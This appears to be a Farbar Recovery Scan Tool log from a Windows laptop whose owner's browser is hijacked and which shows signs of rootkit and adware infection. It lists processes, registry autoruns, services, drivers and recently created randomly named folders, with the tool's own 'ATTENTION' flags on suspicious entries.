(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe

() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe

(Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe

(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\MaxxAudioControl64.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe

(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe

(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSPanel.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe

(Microsoft Corporation) C:\Program Files\Windows NT\Accessories\wordpad.exe

(Microsoft Corporation) C:\Windows\System32\cmd.exe

 

==================== Registry (Whitelisted) ===========================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1610936 2016-07-10] (COMODO)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSLoader.exe [63296 2014-02-25] ()

HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)

HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1980416 2013-12-18] (Wondershare)

HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime Alternative\QTTask.exe [421888 2013-05-01] (Apple Inc.)

HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1589592 2018-03-20] (Google Inc.)

Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)

HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [xdm] => C:\Users\Dan\AppData\Local\XDM\xdm.exe [782848 2014-11-15] (Subhra Das Gupta)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8641240 2016-02-12] (Piriform Ltd)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca0a9-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca102-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"

AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2016-05-16]

ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe ()

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

ProxyEnable: [.DEFAULT] => Proxy is enabled.

ProxyServer: [.DEFAULT] => http=127.0.0.1:61746;https=127.0.0.1:61746

ProxyEnable: [S-1-5-21-1066246007-1091995785-1061003623-1001] => Proxy is enabled.

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt

Tcpip\..\Interfaces\{4BFECB1F-C4F4-478B-9423-CF38BB3D1339}: [DhcpNameServer] 167.206.112.3 167.206.112.4

Tcpip\..\Interfaces\{ADE3F806-57EF-4246-85D9-1A41A1425F70}: [DhcpNameServer] 208.67.222.222 208.67.220.220

 

Internet Explorer:

==================

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)

BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)

 

FireFox:

========

FF DefaultProfile: jefccanc.Daniel-1506042165545

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default [2018-06-08]

FF Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\abs@avira.com.xpi [2017-06-17]

FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]

FF Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-05-31] [Legacy]

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-06-08]

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-06-08]

FF HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Firefox\Extensions: [xdmff@xdman.sourceforge.net] - C:\Users\Dan\AppData\Local\XDM\xdmff

FF Extension: (XDM Helper) - C:\Users\Dan\AppData\Local\XDM\xdmff [2016-04-03] [Legacy] [not signed]

FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)

FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)

FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-04-01] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)

FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)

FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)

FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)

FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)

FF Plugin HKU\S-1-5-21-1066246007-1091995785-1061003623-1001: signiant.com/SigniantTransfer -> C:\Users\Dan\AppData\Roaming\SigniantInc\SigniantTransfer\5.4.4.71844\npSigniantTransfer.dll [2015-07-09] (Signiant Inc.)

 

Chrome:

=======

CHR DefaultProfile: Default

CHR HomePage: Default -> search.mpc.am

CHR StartupUrls: Default -> "hxxps://www.google.com/"

CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default [2018-06-08]

CHR Extension: (Slides) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-22]

CHR Extension: (Facebook Video Downloader - Save FB Video) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\amjcoehkcacocffpmhnefgoeanepjfkf [2018-03-20]

CHR Extension: (Docs) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-22]

CHR Extension: (Instagram tools) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apchgljmbdmgpelofkpfaghmjcgkcmmb [2016-04-03]

CHR Extension: (Google Drive) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-03]

CHR Extension: (Audiotool) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkgoccjhfjgjedhkiefaclppgbmoobnk [2016-04-03]

CHR Extension: (YouTube) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-04-03]

CHR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpconcjcammlapcogcnnelfmaeghhagj [2018-02-04]

CHR Extension: (APK Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgihflhdpokeobcfimliamffejfnmfii [2016-04-03]

CHR Extension: (Google Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-04-03]

CHR Extension: (Sheets) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-22]

CHR Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\flliilndjeohchalpbbcdekjklbdgfkk [2017-06-10]

CHR Extension: (Trevx - Music Downloader) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpmaepaboafhefdejcbiciklgjogoghf [2016-05-15]

CHR Extension: (Google Docs Offline) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-03]

CHR Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjnegcaeklhafolokijcfjliaokphfk [2016-12-20]

CHR Extension: (Video Converter) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcjjnhgakghmggnimjkldjmmpabhnhne [2016-03-08]

CHR Extension: (Chrome Web Store Payments) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]

CHR Extension: (Image Search) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\oeofhjjmgagmjigkfgghbnjjeibokcik [2016-11-22]

CHR Extension: (Notifications for Instagram) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\opnbmdkdflhjiclaoiiifmheknpccalb [2018-01-15]

CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]

CHR Extension: (Adobe HDS / HLS Video Saver) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pibndofbpkoaipoidbkephfhhnapkccn [2018-03-08]

CHR Extension: (Gmail) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-04-03]

CHR Extension: (Chrome Media Router) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-03-22]

CHR Extension: (Instagram) - C:\Program File (x86) ArcWelder - Android Simulator (Google Chrome) - Instagram\com.instagram.android.apk_export_eznre [2016-03-13]

CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile [2018-06-08]

CHR Extension: (Quick Searcher) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2018-03-22]

CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx

 

==================== Services (Whitelisted) ====================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

HKLM\SYSTEM\CurrentControlSet\Services\eubtvna <==== ATTENTION (Rootkit!)

 

S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION

R2 9b2582d4a23748e2d93e755c9fbf7de5; C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll [2150400 2018-03-22] () [File not signed]

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)

R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2021056 2016-03-03] (Adobe Systems, Incorporated)

R2 Asus WebStorage Windows Service; C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe [71680 2014-02-25] (ASUS Cloud Corporation) [File not signed]

S2 CmdAgent; C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe [5817256 2016-07-10] (COMODO)

S3 cmdvirth; C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe [2271928 2016-07-10] (COMODO)

R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()

R2 gramblrclient; C:\Program Files\Gramblr\gramblr.exe [12021840 2018-03-07] () [File not signed]

S4 gzserv; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\gzserv.exe [79552 2018-03-08] (Bitdefender)

R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]

S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)

S2 MBAMService; C:\Program File (x86) Malwarebytes Anti-Malware - VER. 2-B\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)

S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-02-28] (Riverbed Technology, Inc.)

R2 sesvc; C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe [9216 2011-01-02] (www.shadowexplorer.com) [File not signed]

S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)

S2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2014-09-21] (Microsoft Corporation)

S2 GamesAppIntegrationService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe" [X]

S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]

S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION

 

===================== Drivers (Whitelisted) ======================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R1 6bbfa1b48d3fadbf9e2e973e703b29a9; C:\Windows\system32\drivers\6bbfa1b48d3fadbf9e2e973e703b29a9.sys [79776 2018-03-22] ()

R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3892224 2014-03-07] (Qualcomm Atheros Communications, Inc.)

R3 ATP; C:\Windows\System32\drivers\AsusTP.sys [71952 2014-03-31] (ASUS Corporation)

R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [718840 2013-04-17] (BitDefender)

U5 avchv; C:\Windows\System32\Drivers\avchv.sys [261056 2016-03-06] (BitDefender)

S3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [593144 2013-04-17] (BitDefender)

R1 bdfwfpf; C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\bdfwfpf.sys [121928 2013-07-02] (Bitdefender SRL)

R1 cmderd; C:\Windows\System32\DRIVERS\cmderd.sys [32224 2016-07-10] (COMODO)

R1 cmdGuard; C:\Windows\System32\DRIVERS\cmdguard.sys [851864 2016-07-10] (COMODO)

R1 cmdhlp; C:\Windows\system32\DRIVERS\cmdhlp.sys [45600 2016-07-10] (COMODO)

R1 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [148696 2013-04-22] (BitDefender LLC)

R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [138568 2016-07-10] (COMODO)

R3 kbfiltr; C:\Windows\System32\drivers\kbfiltr.sys [17280 2012-08-05] ( )

R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)

S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)

R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2013-10-27] (Intel Corporation)

S3 NPF; C:\Windows\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)

R3 TotRec8; C:\Windows\system32\drivers\TotRec8.sys [125640 2014-04-30] (High Criteria inc.)

U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [24688 2017-06-09] ()

R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [382536 2013-05-28] (BitDefender S.R.L.)

R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)

R3 VASDeviceDrm; C:\Windows\system32\drivers\vasdDev.sys [1454896 2012-03-19] (ShiningMorning Inc.)

R0 vsock; C:\Windows\System32\drivers\vsock.sys [73296 2013-10-08] (VMware, Inc.)

S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2014-09-21] (Microsoft Corporation)

S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2014-09-21] (Microsoft Corporation)

S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2014-09-21] (Microsoft Corporation)

S4 hrlvm; System32\drivers\usbcmpvz.sys [X]

R3 loruyb; system32\drivers\ruybeh.sys [X]

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2018-06-14 21:36 - 2018-06-14 21:36 - 000000077 _____ C:\Users\Dan\AppData\Local\smplayerhdpi.ini

2018-06-14 21:19 - 2018-06-14 21:19 - 000000000 ____D C:\Users\Dan\AppData\Local\iaclvtr

2018-06-14 21:16 - 2018-06-14 21:16 - 000142672 ____N C:\Windows\system32\Drivers\coooruyb.sys

2018-06-14 21:15 - 2018-06-14 21:15 - 000000000 ____D C:\Users\Dan\AppData\Local\msixzrn

2018-06-14 20:57 - 2018-06-14 20:57 - 000000000 ____D C:\Users\Dan\AppData\Local\auekvlx

2018-06-14 20:26 - 2018-06-14 20:26 - 000000000 ____D C:\Users\Dan\AppData\Local\sbmzaxe

2018-06-13 20:15 - 2018-06-13 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\pwaclvh

2018-06-12 20:35 - 2018-06-12 20:35 - 000000000 ____D C:\Users\Dan\AppData\Local\iabokse

2018-06-12 20:13 - 2018-06-12 20:13 - 000000000 ____D C:\Users\Dan\AppData\Local\sietnkv

2018-06-11 21:38 - 2018-06-11 21:38 - 000000000 ____D C:\Users\Dan\AppData\Local\vsdkhmb

2018-06-11 21:17 - 2018-06-11 21:17 - 000000000 ____D C:\Users\Dan\AppData\Local\cwkbude

2018-06-11 20:54 - 2018-06-11 20:54 - 000000000 ____D C:\Users\Dan\AppData\Local\ianhgkz

2018-06-11 20:14 - 2018-06-11 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\spnamrh

2018-06-10 20:19 - 2018-06-10 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdhvpka

2018-06-09 19:36 - 2018-06-09 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\psnwzov

2018-06-08 20:22 - 2018-06-08 20:22 - 000000000 ____D C:\Users\Dan\AppData\Local\sprxnmw

2018-06-07 20:25 - 2018-06-07 20:25 - 000000000 ____D C:\Users\Dan\AppData\Local\zaothbn

2018-06-06 20:16 - 2018-06-06 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\upcnzih

2018-06-05 20:19 - 2018-06-05 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\wdavblr

2018-06-04 20:46 - 2018-06-04 20:46 - 000000000 ____D C:\Users\Dan\AppData\Local\upmrihe

2018-06-04 20:15 - 2018-06-04 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\widgtzk

2018-06-03 20:18 - 2018-06-03 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\msapgde

2018-06-02 19:42 - 2018-06-02 19:42 - 000000000 ____D C:\Users\Dan\AppData\Local\reepcgo

2018-06-01 20:21 - 2018-06-01 20:21 - 000000000 ____D C:\Users\Dan\AppData\Local\wmkxhrt

2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt

2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw

2018-05-29 20:47 - 2018-05-29 21:04 - 000003084 _____ C:\Windows\System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A}

2018-05-29 20:16 - 2018-05-29 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\avcsxeg

2018-05-28 20:16 - 2018-05-28 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\dtiroaw

2018-05-27 20:40 - 2018-05-27 20:40 - 000000146 _____ C:\Users\Dan\Desktop\Windows Defender - Shortcut.lnk

2018-05-27 20:12 - 2018-05-27 20:12 - 000000000 ____D C:\Users\Dan\AppData\Local\vdmbsup

2018-05-26 19:39 - 2018-05-26 19:39 - 000000000 ____D C:\Users\Dan\AppData\Local\cgkeslp

2018-05-25 20:18 - 2018-05-25 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\nimzwrx

2018-05-24 20:16 - 2018-05-24 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\svhznix

2018-05-23 23:10 - 2018-05-23 23:10 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf

2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ C:\Users\Dan\AppData\Local\recently-used.xbel

2018-05-23 20:16 - 2018-05-23 20:16 - 000000000 ____D C:\Users\Dan\AppData\Local\coeaubg

2018-05-22 20:15 - 2018-05-22 20:15 - 000000000 ____D C:\Users\Dan\AppData\Local\lsrgdch

2018-05-21 18:54 - 2018-05-21 18:54 - 000000000 ____D C:\Users\Dan\AppData\Local\tihexad

2018-05-20 19:05 - 2018-05-20 19:05 - 000000000 ____D C:\Users\Dan\AppData\Local\rtksgep

2018-05-19 19:36 - 2018-05-19 19:36 - 000000000 ____D C:\Users\Dan\AppData\Local\usbziol

2018-05-18 20:19 - 2018-05-18 20:19 - 000000000 ____D C:\Users\Dan\AppData\Local\mskiwue

2018-05-17 20:18 - 2018-05-17 20:18 - 000000000 ____D C:\Users\Dan\AppData\Local\wictgzl

2018-05-16 20:14 - 2018-05-16 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\scdhbzo

2018-05-15 20:14 - 2018-05-15 20:14 - 000000000 ____D C:\Users\Dan\AppData\Local\dwczukm

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2018-06-14 21:42 - 2016-03-03 14:05 - 000000000 ____D C:\FRST

2018-06-14 21:36 - 2016-06-12 19:00 - 000000000 ____D C:\Users\Dan\.smplayer

2018-06-14 21:27 - 2017-03-29 19:14 - 000000074 _____ C:\Users\Dan\AppData\Roaming\sp_data.sys

2018-06-14 21:26 - 2018-03-22 21:52 - 000000004 _____ C:\ProgramData\lock.dat

2018-06-14 21:25 - 2015-02-09 00:09 - 000000000 __RDO C:\Users\Dan\OneDrive

2018-06-14 21:23 - 2015-02-01 10:08 - 000000000 ____D C:\Users\Dan\AppData\Local\Adobe

2018-06-14 21:22 - 2015-11-12 20:24 - 000000000 ____D C:\ProgramData\VMware

2018-06-14 21:19 - 2018-03-22 21:53 - 000000000 ____D C:\Users\Dan\AppData\Local\aucozre

2018-06-14 21:19 - 2018-03-22 21:52 - 000000388 _____ C:\ProgramData\rwi.hhad

2018-06-14 21:19 - 2015-11-13 20:19 - 000000000 ____D C:\ProgramData\Gramblr

2018-06-14 21:18 - 2013-08-22 10:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT

2018-06-14 21:17 - 2018-03-22 21:52 - 002888704 _____ (TOSHIBA CORPORATION) C:\Windows\system32\avmhengsvc.exe

2018-06-14 21:16 - 2013-08-22 09:25 - 012845056 _____ C:\Windows\system32\config\HARDWARE

2018-06-14 20:55 - 2013-08-22 09:25 - 000524288 ___SH C:\Windows\system32\config\BBI

2018-06-13 23:29 - 2015-02-05 08:20 - 000000000 ____D C:\Users\Dan\AppData\Roaming\vlc

2018-06-13 21:02 - 2015-02-03 07:57 - 000000000 ____D C:\Users\Dan\AppData\Local\ocenaudio

2018-06-12 21:29 - 2016-07-05 19:49 - 000000000 ____D C:\ProgramData\boost_interprocess

2018-06-11 21:59 - 2013-08-22 11:36 - 000000000 ____D C:\Windows\system32\NDF

2018-06-08 20:32 - 2013-08-22 09:36 - 000000000 ____D C:\Windows\Inf

2018-06-07 21:59 - 2016-08-26 20:21 - 000000000 ____D C:\Users\Dan\Documents\A - RESTORED FILES - DAN

2018-05-31 20:45 - 2016-07-18 13:30 - 000000000 ____D C:\Users\Dan\Desktop\Video & Various  Software Shortcuts

2018-05-29 22:18 - 2018-03-24 18:39 - 000000000 ____D C:\Users\Dan\AppData\Local\ElevatedDiagnostics

2018-05-29 21:19 - 2017-01-25 19:42 - 000000000 ____D C:\Windows\Minidump

2018-05-29 21:19 - 2016-03-07 20:08 - 000000000 ____D C:\Users\Dan\AppData\Local\CrashDumps

2018-05-29 21:04 - 2018-03-22 21:50 - 000003626 _____ C:\Windows\System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B}

2018-05-29 21:04 - 2018-03-22 21:50 - 000003424 _____ C:\Windows\System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3}

